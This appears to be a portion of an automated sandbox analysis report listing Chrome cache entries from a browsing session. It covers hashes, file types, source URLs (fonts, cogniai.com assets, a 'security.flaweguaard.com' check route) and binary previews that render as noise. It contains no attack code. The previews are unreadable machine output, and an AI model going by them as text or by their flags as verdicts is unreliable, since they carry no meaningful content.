                                                                                                                SSDEEP:12:X/NXrMkrHhm5/WLMHh0ejR++tqsPq4J9GWyD0uYItKUo00UuFLIUipse:XRAOE/gMB6+tqsPqq8HIBUuUXUc
                                                                                                                MD5:D0313B6FD0E683CEB8B1FCB733E3BC92
                                                                                                                SHA1:6C51252A217DACDE9E615E6614955974D181C2C4
                                                                                                                SHA-256:901F8A48DCB1A3ABD93F5A8FC7B8FBBF3559A95816F764A4F4AC11C96E94B9BD
                                                                                                                SHA-512:CCF3AA7EAA634432A5F85A27B865B884ECE9943F014ECE92EA6A57E6960063FE485F128F1AAD6F0373054CA1E9424C0D581CA4803789F8DB03DF376379546AC2
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://fonts.googleapis.com/css2?family=Roboto+Flex&display=swap
                                                                                                                Preview:...........[o.8....+...l.....y..\Z...../(...\hb..j.....}Y....>...O''.7%~..,Kc59P.v..,....D..LQ$.i..V...YIK.d.....jM_....e.G...>I.+.Vt...Y%4^.........f...G[>[Wq[.U.....i<..\.4.i|...VkUs..;...ZZ..E..z.09Lj03..[.....nF..s>.....w5..z...1z.,........Nh.F...~7...........t.xx.&.=Z.]tp..M...I..}..._.'t......Wp.........j......<4..'.gu.C9Z{.....Y...c...3.x..&....\....Z..:.F/w....vFt.Z...:r..nS...\,.Wv...........i\.....%{..@7...D..@..*.....z.....'M.c.@uL....@e..~..L...I.#T..yu0...B.)..D....+......)EYVI.9Yr..<..%-..n...8..*....j.'c.&...v0..^`^..Q...I.#.'..<. .....Bf..B..,...`r0%8<M......B'^.....-.K.8..0.26...!..-...+m.....V.HeL.GF..rE.B...3.x-...V../...y....m...g.C..=X.!.%...#B=....!c.J..x@~b.s..:v&...k.Z.E......*.m.....\X .XVD..T.K.].....tV*.{..-..#`J9.O(......l.$[......X............U?).~...

                                                                                                                Chrome Cache Entry: 251

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 71 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):4851
                                                                                                                Entropy (8bit):7.923514162176035
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:kSBA+tK6FYy2iplBtJx+KuVd2bcfFiJnM0tbwq5ABgTij3EwWbYw:kSqniDdOUb7vt0kxijjWN
                                                                                                                MD5:3ED44EC78BEF2FB1288BCD9441D5C35D
                                                                                                                SHA1:E93401BCE4EC1D1BC5E4A0D3E1E3C23EEFAAD882
                                                                                                                SHA-256:11510DC9B87DC238F157BF35C0563BD0F2739C112A6EF7E337C64194BF836B3B
                                                                                                                SHA-512:C906D89655402E58D86872AF0A942163A82174F933E66E3B3EE9B9F7D46DEB568C72EDB6DCA04AD8783610138C6DF1EFE998BEF914669465A35B2457294E27A3
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://cogniai.com/wp-content/uploads/2023/11/thumb_COGNIAI-Concept9-FF-01-1.png
                                                                                                                Preview:.PNG........IHDR...G...K....."r.d....sRGB...,.....pHYs.................IDATx...xSe...@..e.B.....,"".....0..8...z..(..(...E.^V.i.4I..I..M..i.4m.'--*.;*.A...{....E........y~..=.|....|.......p.\.......z...o..#@H.r.e...... '..pN.;]Q`4...m6.@..9...:...WI8..;._.&P....Ip...L..1...@.|...r........:p.;\2p..p...V....V.. .....KAP.....\!`.....p<d..d.y.Rb.g .B...p..Z.\..n.Xd....y.,,6G$Xcu8.....B...b..0....g.,.H..:0..,.Ng...f..W.[.b......B.YW`..g.;...r...9...Ql.=\l..B...?W.3.....r.e.....AZ.a$...68.....-v..]..........N./.R.....RhE.....-U.f...b.c.Z....P.s..........t..|....`.,......n....Y.......ljIY...S=.Ql...C.s..C......3.'..`"l.C..3.y-3?...g.....Om.~.6O7M./.A..`4.0..=^`...%.!g...~.UR......"W.$.'.l..M...E..Q.m....A.\S.Y\Xl..4./LE...a......0.../.^ .U.....j.V...rN...-:C..P`..ME..E.v\.4..B..S.N..q..3?..k4.<.9.A.;..@WM...#..Td..b.@..<...L.]...U.QA..pZ...5....j..h.....7j....z.Wo..Tc4...<.1..L..0U..9\......og..<. .;...M6..U......S...O...... .u..>..[..q.v"j..)....."..'a.8 f

                                                                                                                Chrome Cache Entry: 252

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, max compression, original size modulo 2^32 907
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):407
                                                                                                                Entropy (8bit):7.377149749026777
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:XDi99oIAFqYm0Eyqk6KbZFdFW5xU6m1zb24rbl4WBqbtl/l:XODoIAoYyYv/W5xNMq1WBUpl
                                                                                                                MD5:1541C06AB02AC7907750439C3BDDB689
                                                                                                                SHA1:908000E45D1B7971077F7E2D6A9F4FC99F03B6D6
                                                                                                                SHA-256:5C8E7D7F9800DDBF0DE0991F418D533646731070929A0A3DA64EB90CD48A5235
                                                                                                                SHA-512:794AD168A41A5FFDDE5FE2337E0E692BA7B0400B7242E576532AC6429D78E323CF841441B26B7500FFD4AB05A799F9DC43BCCE5786CEB7B8789AA7E80345AF0A
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://fonts.googleapis.com/css2?family=Pathway+Gothic+One&display=swap
                                                                                                                Preview:............r.0...>Evj..*...1]tz.{qG.....(:..{..]v..n....../..d.Hs...8C......0._...m.....} .Mp.W.X.!....XT.C.9 /.M..v.(M...C.O{....@....T.u.:`[e...e. ...AR...p...T.R.N..E.......zO.E...|..],..x....x|^..<h.8.}9^>N..-v.j.6..V...<.._.c.1..s/.P.I.G.|[.o`.....*....MNt.J.dc.......8...SL.N.C.x..._..b..e.o..\.b...:..d..?.Od...&V6.1C,.sD.\,..S..V.F.....R..1.....:...%.L.....s..........u.....

                                                                                                                Chrome Cache Entry: 253

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Zstandard compressed data (v0.8+), Dictionary ID: None
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):31
                                                                                                                Entropy (8bit):4.220167681284828
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Wl25NXFMCERaln:L5LuRal
                                                                                                                MD5:DAC29F868FFB0FA7624A040847BDBB6C
                                                                                                                SHA1:FA10B51AD2CEBBC4538BE0087BDEE8C1B44C7BA9
                                                                                                                SHA-256:EBDE04EA29A52A67E47CFCE688878BDA6E96CA57486B17D24A1608AE036A3C96
                                                                                                                SHA-512:050A8707C708C95F0C40C18833A0B7855509163254704F6B4CD8A2CF0B047A9CB5AED15B72793E2C3E15628647289A9C924432D3CA5795E8BC9505F1930EEEE3
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://security.flaweguaard.com/f1E2d3C4b5A6f7E8d9C0b1A2f3E4d5C6
                                                                                                                Preview:(./..X...This is a check route.

                                                                                                                Chrome Cache Entry: 254

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, max compression, original size modulo 2^32 2356
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):636
                                                                                                                Entropy (8bit):7.594544806780424
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:XXFMV/TSHV1PLUH+8V/njTABKGe2D2o2NVXAYMqriGPYjwfnA+nzONwMD3x6nuv:XXc/W+Vv/eKYj2fr3SGjKCMD3x6c
                                                                                                                MD5:93B4285B77D73E9CB506C5799C07CF02
                                                                                                                SHA1:E51552CB8A4E687F5ACDFDC3A666F76A513C4E43
                                                                                                                SHA-256:71EF4B4B9A4702F39BDB283E7A79E37FECB3D7C02AD5777A37C067943DC02770
                                                                                                                SHA-512:55AF14A750BC736044491DB9886591D94C78739C76DC7FAC21677B96FE530EAD90EB89371F3E510DB409946482988011A2CE538E789714E72C0CAEC8F897F618
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://fonts.googleapis.com/css2?family=Nunito+Sans&display=swap
                                                                                                                Preview:...........[o.0.......h;Bl..Io..[.R.u.v7U....9......}.M.$6.]s..-......JKw..<.-...yUr}......i....<.{.*s^i.I.t........jY$.cv..7.i.B.;..O.<.#..c.5oj....&..l.L=m.d.o..g.b[._4<.y.O..h..-..J.5..:..xT<.=..5..G<....[sW.....y.}-...|....c.w..pU.~...g6.X..amS.e...'x.O.....5....S.S......../.-v/E.PKZ.f.2).p....r..lB{.8.".>.........$......;n.4&...z...1~.:.9j......ZK.,Y6...p.J h.`.(..<.eRdMv.q....m`Dt....c..............._l..6....'...^..L.....y.IL5..c8...o...p..X.{..}...7."A..a..B[B8..*.....Hl...P...#8.G.l....U@..K.]..e...ZA.."...p...8.${.@..Pz..s*.....|R$...Rz....-..m..."4.h8*.*DQ..`.q<A...R2!rtU.w.tXP.-..eY..H.........Pz.X4...

                                                                                                                Chrome Cache Entry: 255

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 2560x1435, components 3
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):262236
                                                                                                                Entropy (8bit):7.920695031240109
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:gmW7UWnW0zuC7JW7yFNtBMIDURghP7XI3diminGJItUu/aeWjxnm7:g1nW3khBhDph7YN1iKHu/qM
                                                                                                                MD5:9D08E5E97EE0CF737F881F9D19C714A9
                                                                                                                SHA1:384A1E9BEF799B3B88FCD0A4FD2986A4599161C9
                                                                                                                SHA-256:3E9BF0CCA1223157249EB6DE278422139AEEF2EB68464C19CCF63C678694AC0E
                                                                                                                SHA-512:7798F4F0EE541BB46FD347E544D203B5548E1C6CC02860D5F6EC43B9DB9305A141FF5CAE95EDDCAFBDC89A8DBAC3C87DBC99D56B194105E4952FC4E8930C66E1
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://cogniai.com/wp-content/uploads/2024/09/cyberpunk-illustration-with-neon-colors-futuristic-technology-1-scaled.jpg
                                                                                                                Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..{.KIK]fBR.R..E%-0.(...(.....(...(...(...(...(...(...(.......Q@...c.(..R.@...E..(...(...%-..(...(....Q.(.(........f.4RP!i(....>.Ph....Gj.2h..P.M..GJ................J)i;..E-%..R.@.%-......P.R.))h.w..Q...)h....4b...i)h...)@.4....Q.E.AE....bR.(...M...E......+..:..isM4.L.QF1E30.....qAp.\QF8.....:.@.....XRc.V.F8.7..

                                                                                                                Chrome Cache Entry: 256

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, max speed, from Unix, original size modulo 2^32 127818
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):32005
                                                                                                                Entropy (8bit):7.992499685900364
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:768:mrdl3oyFLiOCWB6wy6tdnlVgJitP0dGyEUGoD+:mPY6LBN7nsJJBEU9+
                                                                                                                MD5:21EE429D6CAF5D732BE4C189715BD1E7
                                                                                                                SHA1:BE9D9DE85BEDA57CC6A31C85954D1BF85B6A3B15
                                                                                                                SHA-256:29A64E88A1281E883076BADE1D6A3358BB4311AF4EB3C2BC64380E77EDEAE491
                                                                                                                SHA-512:73B7EC3E927829FB7725FE5EB8231B3007AC71BDB34B3B72DA7C6DE91391A2836EF9BF2E07B3650DF85C4B2C655848579A106FFFACC10838453004677B4EAAD7
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://cogniai.com/12180
                                                                                                                Preview:............v.G.?.9^k...Db.x.%Y.I.8q...D.q<ZM.)."......>.s>.W8.<....[.(......X$..P(..B.P.GO>....O....7\L...........`#.n.0...$\.^o...pq...OO......`..l...Y4_lx.h...(w1./....|..}.Q.F..b.......Z..p..7......b1.......WN..t...Q\.E..^..u.LF...l6..{.j....&....n.......F.....0.....c.9...".4.nN.K.4.NC.6.....8......g.>x.>.MN.F...x....6.."..Fo.<..<*..w.....M.s`:..Tq.....Wk...'......G..g..F.~tQ9.......(\,F...;.7.A..<.o.)J....v\..D......o.h.......*..o.;...o....r......?....CE.... ...h9..{....^.`4......(....}1..z.e?..o......Q....d4....z....N........O?.~..bo0...>i8..p...d..t.....E.QyZ.>..^T...~......b~......rF<.S./...M.-.......%..*..x...l....a...."..s*..g..VT.........t4..Z.J.A...{..4?.B..ZX..Wao.U-W...L...+...9.G..E.....O....WK....a.3..Q.|>.....)p"....:.+}.,....{g...S...)....r>....Lp...H.+]............%.R.8....Q........=Uq.B..-..F.....o.AX....W.}.m.;...]P..(V.....`........(~...D.@.J.|..1.4Q...o........|...N....<.U.;.SO.D...J=As.'h4..M..y..V.1pz...{.6W....

                                                                                                                Chrome Cache Entry: 257

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, max speed, from Unix, original size modulo 2^32 153314
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):36261
                                                                                                                Entropy (8bit):7.993560797653778
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:768:KDatkXsTdjwav3BsDtU60Lv+JusyutQVeSnuAdLKPF/Si:KDaCXspXv3SDW6Ev+EMQVJnu4GF6i
                                                                                                                MD5:CA61B0673ACA054A6BB440E89F24CA4A
                                                                                                                SHA1:146633F04F9B34ED024D0BC8201FE01693CAA8B7
                                                                                                                SHA-256:F5E50C7F032A263EC419A2A2B8349E49E77F2314E7E98EF9CC7C61074182BC7C
                                                                                                                SHA-512:6EB0AA37999761BEE75D2AE5C0EE99EB433CC01581561E17DD3FB6C16352A076F9BC76413073106E4BC639EC80BC28C1654308EC368454EB38ED15668F3F3268
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://cogniai.com/?verified=true
                                                                                                                Preview:............z.7.7.w.<s...K$.l..<.....(q...+..q<z.dS.E..6)Y.....g...R.J.WU..}..C2.~..D..(....B.Px.../...../..b2...#.p....`#.n.0..c....7..q.8....'n....i0..6.G..,./6.^4].S......~x>....:..h1..n....W....hz.....`c.X........(:...l..z.d...........E4....W.W.....w..n.......F.....0..h.Fus.u.E.i...o..$8......{.`~.n:.=.....l49...[...0>....h....:...J.*....FSw4]...R.=...go......m.tj.7....=..M..E..b.N.7..p..MOc......q..|.......o.q...O.....m..y..6W.m.k.@..w..;.o.......k..)~........_.@|#..r..7..6 ..`.h...E..Q0"...}1..z.e?..o.?.p..<....d4....~....N..x.~.....:?.G.3..C.....4..s4.w>.~..`9.-F.tkT.V....U.j...;...r.._...U.......x/..F.|.&...ix.|....y0^...[...q..........S.v+.~s...ZLl?.......{..7...7.......z...e.[l..*~....|............G.qk....>unq@X..yk.....r+...'.k......G.Ju~....i.8U.....<\,.SgQ.!..[..D..z....._-^..$.^j...#"?J. Q..qp...*NQh.e.....`..m9...~....v.#O .%..b.....}......n..A.+.. ..*P.........f..{m.d......=..[.w.v..V5o..<A..'h(...e.....4].g.(. <.z...{~.+..N.

                                                                                                                Chrome Cache Entry: 258

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, max compression, original size modulo 2^32 876
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):397
                                                                                                                Entropy (8bit):7.419561465790542
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:Xtq5oj3ovfoZkpR7QLIkBh6W7vGiMahQ0uae+Gm9Gs+3955WQCjKNQYKmr:XUWbovNR7Q8C6mia+0W+zMs+395AfYR
                                                                                                                MD5:4FBEE2DBF60CC5242BBFFB1078108A30
                                                                                                                SHA1:6A4EFA7C5F65DD66DB954B94EFE36E572B6DD265
                                                                                                                SHA-256:C1E1D3981A7E2342EE8C3ECFC256E9840A993E5C64F39DD2092DB7BDC12140E1
                                                                                                                SHA-512:0AE6FE43B498DF6959FB05BA5F90B79495C64A6290EDCC80FD2667146F508BAD81146C4794DA0F758EE727A343AC1DC1F9FE935A30D88E295D2ADFE65D88E27F
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://fonts.googleapis.com/css2?family=Titillium+Web&display=swap
                                                                                                                Preview:...........MO.0..........s......5.b..`.^.V....m.......{..}._..(b.WVz....wY]q+...|..h*....s..(.C...9;..T.....K.K..{`.....}.......j.$.84.`.... .m.h.r1T2J........5...|..i.....c=?-.....l3.K.~z.uu...xSL..f..P>x...V.W[1..5..Y......P..DA.H.5D.....6.z..X.J...T\.i.7.HB.j`D.:N.A*}d.%.@..j.c..p*:B.?.;.Y.....6......K..'}H.CZ.......bk...|.8...p..&.....jU~......:. ....@L+f.Q..........u~2l...

                                                                                                                Chrome Cache Entry: 259

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 118810
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):39754
                                                                                                                Entropy (8bit):7.992521242724292
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:768:mAm7E5YI+4BF6NGdrqhOyZFQHcbJor5pDhR1RcCZ0KnJdlXTRG:LRBF6NOqvelzR1RcCZ0mdldG
                                                                                                                MD5:223437852509893C09200D8939688E6A
                                                                                                                SHA1:92D8FCF6FA061F75BA17425FEE5ABC61D7F3C278
                                                                                                                SHA-256:B2592EA118AA184FE1BC5C7DD14B2828E2F8AD6D95AD4C5F63606E736F4DEDE6
                                                                                                                SHA-512:9447138CBF6E461AFA6F7E843E444B564B49D3BE1BF21BB620F272EC2A6F5C1119E5C8F0DECE27CC9C2636745C9439CC98A3ABEB70478D33B427DC3D621205FB
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://cogniai.com/wp-content/themes/techze/js/swiper.min.js?ver=1
                                                                                                                Preview:...........{_.G.6....Xo.H.%$.-..cc;q..1N....R.:......s>.y.........9...u]WU.Z.Z.j...k....y2.'K....#~.I...i.'#.9L...4.....a...4.tO..tr.t.L......yw./u{.x.O...4.tGY2M.Q.f...q{u.........x.6f.j&.....m...Irt<]Zk........~r.L.~F7...8.'..{t....lD....W..^'.x...B..6=.O.Qv.q.>8.....`6...j.MkW.....7.t:..q....q:.fw.V.. ...........-..0E;.j.]..........=.o........|]..'Yd[...Y./e.I..6l.R. .u.0...(.47.A5.{.....x).e...QLj.x:..R..b..7:...+6.E.(....Vk,.6......lVjO:.w..'..u..J?9.....t:A..aR..[E..R........K...o`.g....J...6......i.p...J.D......<...O{..x4m.&10..0.WuX.aNF....o^wR...Q.w...o....0..M.7..N..m.g.q5..O.j......:./_*......._....w\]._jl>i.?....*.Xxj.?g..rW@M'O..].Z{.j..S...W}W.......k.......<..@.{..../1.1..?`..R,.9.#=..o;.!.j:)O.@..k..9....&.f....G....].}0..u...w...N....\.z..N.*......T.F.l.S.t.....J::?..a%.-..+..2....!{..1md......p6......#....];............o$.c...u>.q..^.Ig...n.b..D.R.*.....^.....=..7......$Q.I...]tDS.b.j.=K...t....<=Bc.J.:..=.F..:

                                                                                                                Chrome Cache Entry: 260

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Zstandard compressed data (v0.8+), Dictionary ID: None
                                                                                                                Category:dropped
                                                                                                                Size (bytes):818
                                                                                                                Entropy (8bit):7.721060067188947
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:a+QQ09n4TtTbbl771P+lGpQ3/URM4z2C81vD:sQ09nWf2lGwLC81vD
                                                                                                                MD5:5F7CBC2210C81A3C5C0EFDF102C41F26
                                                                                                                SHA1:30F8720254AC319803B104CAACB3AC4356933861
                                                                                                                SHA-256:AB958DBACD3DFE7937D0CF253130B67E817F4C17C3AC6B6A214AB8A6277290AE
                                                                                                                SHA-512:600468E8EF82241C45F6FDC15C44722A77EAA04B46D6669C11BDE089BE37DBF68EE3C7A81FEF029316019427C679E604918D09C16B2B0DBF21CD240ECFA55149
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:(./..XM...0.#.s.y....!..'...[a....................b....b;..f......L.._.Js.e[z.s.J..N..9.#...{,H.#.."...-P../........-.tF....i.%..&02..w....7.vw......f"...F.a..p".p%,40 *".Z.nU.|.I.Dg.UJ.a.8}e"..2..%.Z.:.,.u..4..=.>G...2.P...D&M.rH.J.D....?..*%.....-.@N...I..L...>:-Ss...+..>.....h....T.......#.'..............qT.Ta....Q/.d....i.l.*..+.-..&.U...d.K...../...;PS...-.....~....}< jb..6.&R+G..OcM....Z..xd..pS...N......Lo>.Q.$...k..j..N.*.v...A.d.r..~...c.a*..X.d!,.5.:(..t..X[.+.k_l}......A.h.A.h.a..#p..s".!..ZrNI..j..3D..k.E.5.'....4..[.a.#.8#.....$..0.B.....@0...9..SJ E.DB...2...eXKd...T/.....yqA:7p...%.z....Qh...*........5U{..|..Q.=.3..s.0....`...k..3W...._.L.T79...<...$....../c..RY`@.D...5.R-.?p+.N;...E:WQ6...4s!.F....#..$........h..mx/..."...#..5.%...A2....Ba..

                                                                                                                Chrome Cache Entry: 261

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 60312
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):12865
                                                                                                                Entropy (8bit):7.983691477163725
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:SFgul0W9/VLpNN41NRrnYZkFot5ZqwXR9Kcok5BXa:hv4VLLN410ZkFot5rvKzk/a
                                                                                                                MD5:20B26BD1ABDA49B167A06D565DEA603A
                                                                                                                SHA1:BD6DE3EEE7CCE753B8A0A54FA9FA81A0A4B3BD84
                                                                                                                SHA-256:69DB5BDCE1344078C266DB619F21B494D3D4945137245FFA97BD64AD28D6574A
                                                                                                                SHA-512:04B9E0E7F72492CBA82C82038CE55D364787D5005A6E74BF2123E2C460AD1CD8FB8A813FCEF86C137795FCAF0F56BB2F633135F1B0B26DC6236E4DA31265117E
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://ka-f.fontawesome.com/releases/v5.15.4/css/free.min.css?token=e8bbb49528
                                                                                                                Preview:................].....W.:.0.F=....Yx.....bs....(..nI.).{z...T.)U..J.....6..<$...........v?.A...O..........~.}.Jz..v'..........`|..@..3.]|...a:..~...w.C.q....?.....v.|.}/.~.......5}}zh.G.?....?..1.E.....sd...^J}...pT.ub..............x..i...A...xTw.==.y.... UO.s.3U.|..4..#.....Y......>..F.;...._..<..?._..enJ........!z........i../.S.-.|9....R.l..Ka.-L/..0....B.Q.-,.......V....p..../....2...1*..z|..>.YM.@s...x.~........(...>$.v.G.4f..E.......('.....wT.g~^F.Qb.u..'..?.DKn.Z.'.-zi........Clfeg....w...sy.h#...@V......2......s.-.yk;I....V(...f..V]}.l.w%....d...2......../_./R..Am..u.M.........`..]2..P..C+.a.....|N.N.d.M.....{.#..w..'..*..i...........X....j.!n...G\.U...D.j._..~.._D.;..h...?E...6;|3*y.....cO../...?...$[..':...~X.0..G..7.Aa..a......&.'...Ks......8.=qL.X.K..Vwb.NR./62.~..L............!"[...U*.e.*.......M.....]'.A...m.N..A......q...zw..M...m........eF....Z."...->}....k..`@w....;w.....iL,y...>....H...?&.:G..D.@...W.

                                                                                                                Chrome Cache Entry: 262

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, max compression, original size modulo 2^32 1225
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):455
                                                                                                                Entropy (8bit):7.4687617332415845
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:XtlEOgnqSF4hH/PaqBWVWxE0YH5JZZ0rFN1FIrlLwTFRWfTfEli5+rRUMwZ71xyk:XXEPqSF48oWuwe8EaslIh/88J
                                                                                                                MD5:64A569700B0F4FADFD0DCD20C7EE8267
                                                                                                                SHA1:BC98522541614FBB4304D03C378EB7192AD944B9
                                                                                                                SHA-256:4350B85F1BBB2288F8E6AD7404F4395CC3C5CEE472B741ED08CE64445FB2987C
                                                                                                                SHA-512:91677E00689814891EDF6E17C6613E34574A3026B67EC12F69B53D63A40110598BE1A90B7D1EC48993BF29AF0E5748B7CD4885B0DF3B5DF559BBECC1233CAA8A
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://fonts.googleapis.com/css2?family=Ms+Madi&display=swap
                                                                                                                Preview:............n.0.E.....I.b)V6..iQ...E...z.&.;(.....#..Hw.8.hH.#..{....1.[..M;.6h..a.g....{I....j...+.tM.q.W.i....M.....6...&.P.....{.wg...L.+3.......{nxoz.?....h.......Q.J...J..?...m..7.#....s....q...j..!..) .Gx1...Rz.+.X{..D..+K.,U... ....I.:.$.r.....8.,..,.. ..z.g........h?....,`n..S*.....C.;..J.".P.2.(.S..$[`cYd...\.(p.+.9..^.N.A....)'e.GX...ki."Hc....\.Z.?fJ8S.R.!...D...e...d.."..... "...>{.?.%.....8.+.l*..g./........2.v....

                                                                                                                Chrome Cache Entry: 263

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 17007
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):7618
                                                                                                                Entropy (8bit):7.97485348216608
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:U+ZW8a26aQheSMKl623DfSSpo7q8k6PusXuTarksV69imev:U+Zz6e7Kl6i167qU/XuWrMQm2
                                                                                                                MD5:201C0ECC6F7EB897DF255A5A4F75461A
                                                                                                                SHA1:9E9269545F5C2EAD3C0564C31FBE38B19EA7E38A
                                                                                                                SHA-256:148156BDCA4540BDEC77FA11E88560E9F0FE870F3FC4B402237C58BBE9059595
                                                                                                                SHA-512:C55C2B60578C640A908F5084A3682875C07797344C8E9476F2B2224CDFBD823A9C76C7AA2B6583CCA6A5895C0BF51D05F927DAC44BE0A1D42F4C19F090255523
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://cogniai.com/wp-content/themes/techze/js/team.js?ver=1
                                                                                                                Preview:...........[yw.H.......F*d........].M.p.M..R..DI.G..g._d...w.x.c.TdDdd....X.zn....o.N...s..s/..<..gX.{'.^$...)..V./.R..E..i..o##`7.TjI.0.....e.m.2.....$U..A9..k@-.2.38u.0.qC....t.J..7.).....s.g.R.;.*a.s........X8..".A@....k..z....5G.Qu.Vn...JB..&...?T.....k........j...Ui........bX...)~.t=|.3..Y.v\..)~.......4q.-...%5TZ..,e9. .."`. .!U....B.)/>..>H.k(..g#o..)..!eE|(:!...wc..@......u..3.~.us3...va....1..F.\..^.....VBP...1...C..n...9n....C.B...7g~..A_...\.......hm.T...Y$..F.....uW.S.....>.~..#j...@Dm...;.^<.1}..@...Yka..tA.t.h;SlDf.m.%....w.....t.(....`\4........MW..N.@@..t..}4.;.....w....b%.N&..'..o..}.=.._.n$..W........8.2.#m....w.....0X....>..7.l(..O....#4kT.o..>4....8.>bkbc........}.....cJlsK............zkl.....c&......u[..`.z:...74...<.......z8x.r(+....l.F.eO.OJ..\.@....f...6..........&.J{i.!t.<..........1.a..L..!......0..0|%...c.Y.bw!6Hj..6.x.$Er....C.?..>?.Q..*.^.O,.`.....VrS...$..Tw.x>.......1.<..3c..J=...X..v.7.1...

                                                                                                                Chrome Cache Entry: 264

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, max compression, original size modulo 2^32 889
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):400
                                                                                                                Entropy (8bit):7.343296885336018
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:XUFWXYMHJIK/USRyKKQ1OvUEf1E/4eMGDv:Xl3JI8pyKKbv/RSDv
                                                                                                                MD5:61BF8A68419A9773F010385E790377E5
                                                                                                                SHA1:2F80762E263A81F0CF4ABCE63C800BF6E62C48F5
                                                                                                                SHA-256:2B2966A880B0B5B5B9AA894936ED58184DAE878B88D9CBCEF9D5C6B0BEDE3B05
                                                                                                                SHA-512:4393E53FDD07098B2877FA729FD18ED542E3720314E9E6FFF35C60C119044DAEB8F2397158ED30EBE3DAE3DFEF0171175DE9CF568C7271972DA094B9CA212362
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://fonts.googleapis.com/css2?family=Hammersmith+One&display=swap
